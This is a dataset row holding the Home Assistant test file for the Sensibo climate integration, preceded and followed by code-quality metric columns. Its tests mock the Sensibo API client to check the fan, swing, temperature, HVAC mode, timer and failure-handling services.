| qsc_code_frac_chars_digital_quality_signal | 0.018062 |
| qsc_code_frac_chars_whitespace_quality_signal | 0.303389 |
| qsc_code_size_file_byte_quality_signal | 29,009 |
| qsc_code_num_lines_quality_signal | 601 |
| qsc_code_num_chars_line_max_quality_signal | 165 |
| qsc_code_num_chars_line_mean_quality_signal | 48.267887 |
| qsc_code_frac_chars_alphabet_quality_signal | 0.802949 |
| qsc_code_frac_chars_comments_quality_signal | 0.312799 |
| qsc_code_cate_xml_start_quality_signal | 0 |
| qsc_code_frac_lines_dupe_lines_quality_signal | 0.779605 |
| qsc_code_cate_autogen_quality_signal | 0 |
| qsc_code_frac_lines_long_string_quality_signal | 0 |
| qsc_code_frac_chars_string_length_quality_signal | 0.005866 |
| qsc_code_frac_chars_long_word_length_quality_signal | 0.002077 |
| qsc_code_frac_lines_string_concat_quality_signal | 0 |
| qsc_code_cate_encoded_data_quality_signal | 0 |
| qsc_code_frac_chars_hex_words_quality_signal | 0 |
| qsc_code_frac_lines_prompt_comments_quality_signal | 0 |
| qsc_code_frac_lines_assert_quality_signal | 0 |
| qsc_codepython_cate_ast_quality_signal | 1 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | 0.055921 |
| qsc_codepython_cate_var_zero_quality_signal | false |
| qsc_codepython_frac_lines_pass_quality_signal | 0 |
| qsc_codepython_frac_lines_import_quality_signal | 0.032895 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | 0 |
| qsc_codepython_score_lines_no_logic_quality_signal | 0.125 |
| qsc_codepython_frac_lines_print_quality_signal | 0.003289 |
| qsc_code_num_words | 0 |
| qsc_code_num_chars | 0 |
| qsc_code_mean_word_length | 0 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | 0 |
| qsc_code_frac_chars_top_3grams | 0 |
| qsc_code_frac_chars_top_4grams | 0 |
| qsc_code_frac_chars_dupe_5grams | 1 |
| qsc_code_frac_chars_dupe_6grams | 1 |
| qsc_code_frac_chars_dupe_7grams | 1 |
| qsc_code_frac_chars_dupe_8grams | 1 |
| qsc_code_frac_chars_dupe_9grams | 1 |
| qsc_code_frac_chars_dupe_10grams | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 |
| qsc_code_frac_chars_digital | 0 |
| qsc_code_frac_chars_whitespace | 0 |
| qsc_code_size_file_byte | 0 |
| qsc_code_num_lines | 0 |
| qsc_code_num_chars_line_max | 0 |
| qsc_code_num_chars_line_mean | 0 |
| qsc_code_frac_chars_alphabet | 0 |
| qsc_code_frac_chars_comments | 0 |
| qsc_code_cate_xml_start | 0 |
| qsc_code_frac_lines_dupe_lines | 1 |
| qsc_code_cate_autogen | 0 |
| qsc_code_frac_lines_long_string | 0 |
| qsc_code_frac_chars_string_length | 0 |
| qsc_code_frac_chars_long_word_length | 0 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | 0 |
| qsc_code_frac_chars_hex_words | 0 |
| qsc_code_frac_lines_prompt_comments | 0 |
| qsc_code_frac_lines_assert | 0 |
| qsc_codepython_cate_ast | 0 |
| qsc_codepython_frac_lines_func_ratio | 0 |
| qsc_codepython_cate_var_zero | 0 |
| qsc_codepython_frac_lines_pass | 0 |
| qsc_codepython_frac_lines_import | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 |
| qsc_codepython_score_lines_no_logic | 0 |
| qsc_codepython_frac_lines_print | 0 |
| effective | 0 |
| hits | 7 |
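The `qsc_code_frac_chars_dupe_{5..10}grams_quality_signal` columns report how much of the text falls inside word n-grams that occur more than once; the high values above (0.89 to 0.93) are plausible for this row, whose four classes repeat near-identical bodies. A rough sketch of one common way such a signal is computed; the dataset's exact tokenization and weighting are assumptions:

```python
from collections import Counter

def frac_chars_dupe_ngrams(text: str, n: int) -> float:
    """Fraction of word characters covered by word n-grams that appear
    at least twice (a plausible definition, assumed here)."""
    words = text.split()
    if len(words) < n:
        return 0.0
    ngrams = [tuple(words[i:i + n]) for i in range(len(words) - n + 1)]
    counts = Counter(ngrams)
    covered = [False] * len(words)
    for i, gram in enumerate(ngrams):
        if counts[gram] > 1:
            # Mark every word position inside a repeated n-gram as covered.
            for j in range(i, i + n):
                covered[j] = True
    total = sum(len(w) for w in words)
    dup = sum(len(w) for w, c in zip(words, covered) if c)
    return dup / total if total else 0.0

print(frac_chars_dupe_ngrams("a b c d a b c d e f", 2))  # 0.8
```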
Row 2

| Field | Value |
|---|---|
| hexsha | 16e83162600419490c56298c84ba3c8791caf968 |
| size | 28,770 |
| ext | py |
| lang | Python |
| max_stars_repo_path | tests/components/sensibo/test_climate.py |
| max_stars_repo_name | Gluwc/home_assistant |
| max_stars_repo_head_hexsha | 0ace5af9143e9e9a279419ec8a469123e49eca45 |
| max_stars_repo_licenses | ["Apache-2.0"] |
| max_stars_count | 30,023 |
| max_stars_repo_stars_event_min_datetime | 2016-04-13T10:17:53.000Z |
| max_stars_repo_stars_event_max_datetime | 2020-03-02T12:56:31.000Z |
| max_issues_repo_path | tests/components/sensibo/test_climate.py |
| max_issues_repo_name | Gluwc/home_assistant |
| max_issues_repo_head_hexsha | 0ace5af9143e9e9a279419ec8a469123e49eca45 |
| max_issues_repo_licenses | ["Apache-2.0"] |
| max_issues_count | 24,710 |
| max_issues_repo_issues_event_min_datetime | 2016-04-13T08:27:26.000Z |
| max_issues_repo_issues_event_max_datetime | 2020-03-02T12:59:13.000Z |
| max_forks_repo_path | tests/components/sensibo/test_climate.py |
| max_forks_repo_name | Gluwc/home_assistant |
| max_forks_repo_head_hexsha | 0ace5af9143e9e9a279419ec8a469123e49eca45 |
| max_forks_repo_licenses | ["Apache-2.0"] |
| max_forks_count | 11,956 |
| max_forks_repo_forks_event_min_datetime | 2016-04-13T18:42:31.000Z |
| max_forks_repo_forks_event_max_datetime | 2020-03-02T09:32:12.000Z |

content:

```python
"""The test for the sensibo binary sensor platform."""
from __future__ import annotations
from datetime import datetime, timedelta
from unittest.mock import AsyncMock, patch
from pysensibo.model import SensiboData
import pytest
from voluptuous import MultipleInvalid
from homeassistant.components.climate.const import (
ATTR_FAN_MODE,
ATTR_HVAC_MODE,
ATTR_SWING_MODE,
ATTR_TARGET_TEMP_HIGH,
ATTR_TARGET_TEMP_LOW,
DOMAIN as CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
SERVICE_SET_HVAC_MODE,
SERVICE_SET_SWING_MODE,
SERVICE_SET_TEMPERATURE,
)
from homeassistant.components.sensibo.climate import (
ATTR_MINUTES,
SERVICE_ASSUME_STATE,
SERVICE_TIMER,
_find_valid_target_temp,
)
from homeassistant.components.sensibo.const import DOMAIN
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_STATE,
ATTR_TEMPERATURE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_UNKNOWN,
)
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import HomeAssistantError
from homeassistant.util import dt
from tests.common import async_fire_time_changed
async def test_climate_find_valid_targets():
"""Test function to return temperature from valid targets."""
valid_targets = [10, 16, 17, 18, 19, 20]
assert _find_valid_target_temp(7, valid_targets) == 10
assert _find_valid_target_temp(10, valid_targets) == 10
assert _find_valid_target_temp(11, valid_targets) == 16
assert _find_valid_target_temp(15, valid_targets) == 16
assert _find_valid_target_temp(16, valid_targets) == 16
assert _find_valid_target_temp(18.5, valid_targets) == 19
assert _find_valid_target_temp(20, valid_targets) == 20
assert _find_valid_target_temp(25, valid_targets) == 20
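# Taken together, these asserts pin down the contract: requests below the
# lowest valid target snap up to it, requests above the highest snap down
# to it, and anything in between rounds up to the next valid target.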
async def test_climate(
hass: HomeAssistant, load_int: ConfigEntry, get_data: SensiboData
) -> None:
"""Test the Sensibo climate."""
state1 = hass.states.get("climate.hallway")
state2 = hass.states.get("climate.kitchen")
assert state1.state == "heat"
assert state1.attributes == {
"hvac_modes": [
"cool",
"heat",
"dry",
"heat_cool",
"fan_only",
"off",
],
"min_temp": 10,
"max_temp": 20,
"target_temp_step": 1,
"fan_modes": ["quiet", "low", "medium"],
"swing_modes": [
"stopped",
"fixedTop",
"fixedMiddleTop",
],
"current_temperature": 21.2,
"temperature": 25,
"current_humidity": 32.9,
"fan_mode": "high",
"swing_mode": "stopped",
"friendly_name": "Hallway",
"supported_features": 41,
}
assert state2.state == "off"
async def test_climate_fan(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate fan service."""
state1 = hass.states.get("climate.hallway")
assert state1.attributes["fan_mode"] == "high"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_FAN_MODE: "low"},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["fan_mode"] == "low"
monkeypatch.setattr(
get_data.parsed["ABC999111"],
"active_features",
[
"timestamp",
"on",
"mode",
"swing",
"targetTemperature",
"horizontalSwing",
"light",
],
)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
):
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_FAN_MODE: "low"},
blocking=True,
)
await hass.async_block_till_done()
state3 = hass.states.get("climate.hallway")
assert state3.attributes["fan_mode"] == "low"
async def test_climate_swing(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate swing service."""
state1 = hass.states.get("climate.hallway")
assert state1.attributes["swing_mode"] == "stopped"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_SWING_MODE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_SWING_MODE: "fixedTop"},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["swing_mode"] == "fixedTop"
monkeypatch.setattr(
get_data.parsed["ABC999111"],
"active_features",
[
"timestamp",
"on",
"mode",
"targetTemperature",
"horizontalSwing",
"light",
],
)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
):
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_SWING_MODE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_SWING_MODE: "fixedTop"},
blocking=True,
)
await hass.async_block_till_done()
state3 = hass.states.get("climate.hallway")
assert state3.attributes["swing_mode"] == "fixedTop"
async def test_climate_temperatures(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate temperature service."""
state1 = hass.states.get("climate.hallway")
assert state1.attributes["temperature"] == 25
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_TEMPERATURE: 20},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["temperature"] == 20
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_TEMPERATURE: 15},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["temperature"] == 16
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_TEMPERATURE: 18.5},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["temperature"] == 19
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_TEMPERATURE: 24},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["temperature"] == 20
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_TEMPERATURE: 20},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["temperature"] == 20
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
with pytest.raises(MultipleInvalid):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: state1.entity_id},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["temperature"] == 20
monkeypatch.setattr(
get_data.parsed["ABC999111"],
"active_features",
[
"timestamp",
"on",
"mode",
"swing",
"horizontalSwing",
"light",
],
)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_TEMPERATURE: 20},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["temperature"] == 20
async def test_climate_temperature_is_none(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate temperature service no temperature provided."""
monkeypatch.setattr(
get_data.parsed["ABC999111"],
"active_features",
[
"timestamp",
"on",
"mode",
"fanLevel",
"targetTemperature",
"swing",
"horizontalSwing",
"light",
],
)
monkeypatch.setattr(
get_data.parsed["ABC999111"],
"target_temp",
25,
)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
state1 = hass.states.get("climate.hallway")
assert state1.attributes["temperature"] == 25
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
):
with pytest.raises(ValueError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{
ATTR_ENTITY_ID: state1.entity_id,
ATTR_TARGET_TEMP_HIGH: 30,
ATTR_TARGET_TEMP_LOW: 20,
},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["temperature"] == 25
async def test_climate_hvac_mode(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate hvac mode service."""
monkeypatch.setattr(
get_data.parsed["ABC999111"],
"active_features",
[
"timestamp",
"on",
"mode",
"fanLevel",
"targetTemperature",
"swing",
"horizontalSwing",
"light",
],
)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
state1 = hass.states.get("climate.hallway")
assert state1.state == "heat"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices_data",
return_value=get_data,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_HVAC_MODE: "off"},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.state == "off"
monkeypatch.setattr(get_data.parsed["ABC999111"], "device_on", False)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices_data",
return_value=get_data,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_HVAC_MODE: "heat"},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.state == "heat"
async def test_climate_on_off(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate on/off service."""
monkeypatch.setattr(get_data.parsed["ABC999111"], "hvac_mode", "heat")
monkeypatch.setattr(get_data.parsed["ABC999111"], "device_on", True)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
state1 = hass.states.get("climate.hallway")
assert state1.state == "heat"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: state1.entity_id},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.state == "off"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: state1.entity_id},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.state == "heat"
async def test_climate_service_failed(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate service failed."""
monkeypatch.setattr(get_data.parsed["ABC999111"], "hvac_mode", "heat")
monkeypatch.setattr(get_data.parsed["ABC999111"], "device_on", True)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
state1 = hass.states.get("climate.hallway")
assert state1.state == "heat"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Error", "failureReason": "Did not work"}},
):
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: state1.entity_id},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.state == "heat"
async def test_climate_assumed_state(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate assumed state service."""
monkeypatch.setattr(get_data.parsed["ABC999111"], "hvac_mode", "heat")
monkeypatch.setattr(get_data.parsed["ABC999111"], "device_on", True)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
state1 = hass.states.get("climate.hallway")
assert state1.state == "heat"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices_data",
return_value=get_data,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
DOMAIN,
SERVICE_ASSUME_STATE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_STATE: "off"},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.state == "off"
async def test_climate_no_fan_no_swing(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate fan service."""
state = hass.states.get("climate.hallway")
assert state.attributes["fan_mode"] == "high"
assert state.attributes["swing_mode"] == "stopped"
monkeypatch.setattr(get_data.parsed["ABC999111"], "fan_mode", None)
monkeypatch.setattr(get_data.parsed["ABC999111"], "swing_mode", None)
monkeypatch.setattr(get_data.parsed["ABC999111"], "fan_modes", None)
monkeypatch.setattr(get_data.parsed["ABC999111"], "swing_modes", None)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
state = hass.states.get("climate.hallway")
assert state.attributes["fan_mode"] is None
assert state.attributes["swing_mode"] is None
assert state.attributes["fan_modes"] is None
assert state.attributes["swing_modes"] is None
async def test_climate_set_timer(
hass: HomeAssistant,
entity_registry_enabled_by_default: AsyncMock,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate Set Timer service."""
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
state1 = hass.states.get("climate.hallway")
assert hass.states.get("sensor.hallway_timer_end_time").state == STATE_UNKNOWN
assert hass.states.get("binary_sensor.hallway_timer_running").state == "off"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices_data",
return_value=get_data,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_timer",
return_value={"status": "success", "result": {"id": "SzTGE4oZ4D"}},
):
await hass.services.async_call(
DOMAIN,
SERVICE_TIMER,
{
ATTR_ENTITY_ID: state1.entity_id,
ATTR_STATE: "on",
ATTR_MINUTES: 30,
},
blocking=True,
)
await hass.async_block_till_done()
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_on", True)
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_id", "SzTGE4oZ4D")
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_state_on", False)
monkeypatch.setattr(
get_data.parsed["ABC999111"],
"timer_time",
datetime(2022, 6, 6, 12, 00, 00, tzinfo=dt.UTC),
)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
assert (
hass.states.get("sensor.hallway_timer_end_time").state
== "2022-06-06T12:00:00+00:00"
)
assert hass.states.get("binary_sensor.hallway_timer_running").state == "on"
assert hass.states.get("binary_sensor.hallway_timer_running").attributes == {
"device_class": "running",
"friendly_name": "Hallway Timer Running",
"icon": "mdi:timer",
"id": "SzTGE4oZ4D",
"turn_on": False,
}
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices_data",
return_value=get_data,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_del_timer",
return_value={"status": "success"},
):
await hass.services.async_call(
DOMAIN,
SERVICE_TIMER,
{
ATTR_ENTITY_ID: state1.entity_id,
ATTR_STATE: "off",
},
blocking=True,
)
await hass.async_block_till_done()
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_on", False)
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_id", None)
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_state_on", None)
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_time", None)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
assert hass.states.get("sensor.hallway_timer_end_time").state == STATE_UNKNOWN
assert hass.states.get("binary_sensor.hallway_timer_running").state == "off"
async def test_climate_set_timer_failures(
hass: HomeAssistant,
entity_registry_enabled_by_default: AsyncMock,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate Set Timer service failures."""
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
state1 = hass.states.get("climate.hallway")
assert hass.states.get("sensor.hallway_timer_end_time").state == STATE_UNKNOWN
assert hass.states.get("binary_sensor.hallway_timer_running").state == "off"
with pytest.raises(ValueError):
await hass.services.async_call(
DOMAIN,
SERVICE_TIMER,
{
ATTR_ENTITY_ID: state1.entity_id,
ATTR_STATE: "on",
},
blocking=True,
)
await hass.async_block_till_done()
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices_data",
return_value=get_data,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_timer",
return_value={"status": "success", "result": {"id": ""}},
):
await hass.services.async_call(
DOMAIN,
SERVICE_TIMER,
{
ATTR_ENTITY_ID: state1.entity_id,
ATTR_STATE: "on",
ATTR_MINUTES: 30,
},
blocking=True,
)
await hass.async_block_till_done()
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_on", True)
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_id", None)
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_state_on", False)
monkeypatch.setattr(
get_data.parsed["ABC999111"],
"timer_time",
datetime(2022, 6, 6, 12, 00, 00, tzinfo=dt.UTC),
)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
DOMAIN,
SERVICE_TIMER,
{
ATTR_ENTITY_ID: state1.entity_id,
ATTR_STATE: "off",
},
blocking=True,
)
await hass.async_block_till_done()
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices_data",
return_value=get_data,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_timer",
return_value={"status": "failure"},
):
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
DOMAIN,
SERVICE_TIMER,
{
ATTR_ENTITY_ID: state1.entity_id,
ATTR_STATE: "on",
ATTR_MINUTES: 30,
},
blocking=True,
)
await hass.async_block_till_done()
```
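The tests above all follow one pattern: patch the Sensibo client where the integration calls it, drive a service call, then assert on the resulting state, with `pytest.raises` guarding the failure paths. Stripped of the Home Assistant fixtures, the underlying mocking idiom looks roughly like this (`SensiboLikeClient` and `Thermostat` are invented for illustration):

```python
import asyncio
from unittest.mock import patch

class SensiboLikeClient:
    """Stand-in for the real API client (illustrative, not the real class)."""
    async def async_set_ac_state_property(self, name, value):
        raise NotImplementedError("the real implementation would hit the network")

class Thermostat:
    """Minimal entity that forwards commands to its client."""
    def __init__(self, client):
        self.client = client
        self.fan_mode = "high"

    async def set_fan_mode(self, mode):
        result = await self.client.async_set_ac_state_property("fanLevel", mode)
        if result["result"]["status"] != "Success":
            raise RuntimeError(result["result"].get("failureReason"))
        self.fan_mode = mode

async def main():
    thermostat = Thermostat(SensiboLikeClient())
    # Success path: patch the client call, then observe the state change.
    with patch.object(
        SensiboLikeClient,
        "async_set_ac_state_property",
        return_value={"result": {"status": "Success"}},
    ):
        await thermostat.set_fan_mode("low")
    assert thermostat.fan_mode == "low"
    # Failure path: an error payload surfaces as an exception; state is unchanged.
    with patch.object(
        SensiboLikeClient,
        "async_set_ac_state_property",
        return_value={"result": {"status": "Error", "failureReason": "nope"}},
    ):
        try:
            await thermostat.set_fan_mode("medium")
        except RuntimeError:
            pass
    assert thermostat.fan_mode == "low"

asyncio.run(main())
```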
Quality signals:

| Field | Value |
|---|---|
| avg_line_length | 31.685022 |
| max_line_length | 92 |
| alphanum_fraction | 0.629788 |
| qsc_code_num_words_quality_signal | 3,041 |
| qsc_code_num_chars_quality_signal | 28,770 |
| qsc_code_mean_word_length_quality_signal | 5.675765 |
| qsc_code_frac_words_unique_quality_signal | 0.062151 |
| qsc_code_frac_chars_top_2grams_quality_signal | 0.025956 |
